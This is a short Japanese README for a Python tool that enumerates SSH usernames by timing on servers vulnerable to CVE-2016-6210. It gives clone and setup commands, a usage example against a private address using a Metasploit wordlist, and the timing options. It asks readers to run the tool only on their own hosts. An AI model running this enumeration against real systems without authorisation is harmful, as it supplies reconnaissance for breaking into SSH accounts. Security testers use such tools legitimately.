
CVE-2016-6210 の影響を受ける SSH デーモンに対するユーザー名列挙。
CVE-2016-6210 の影響を受ける SSH デーモンに対するユーザ名列挙ツール。
自身のホストに対してのみ使用してください!許可されていない対象への攻撃は大きなトラブルを招く可能性があります!
git clone https://github.com/coolbabayaga/CVE-2016-6210.git
cd ssh-enum-cve-2016-6210
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
40136.py -h
example: 40136.py -U /usr/share/wordlists/metasploit/unix_users.txt -e -s 192.168.44.63:22
位置引数: host SSHサーバのアドレスを指定(例: ip:port または IPアドレスのみ)
オプション: -h, --help ヘルプメッセージを表示して終了 -u, --user USER 単一のユーザ名を指定 -U, --userlist USERLIST ユーザ一覧を含むファイルを指定 -e, --enumerated 列挙したユーザのみ表示 -s, --silent サイレントモード --bytes BYTES パスワードとして送信するバイト数 --samples SAMPLES ベースラインタイミングのサンプル数 --factor FACTOR タイミング境界の係数 --trials TRIALS ユーザあたりの試行回数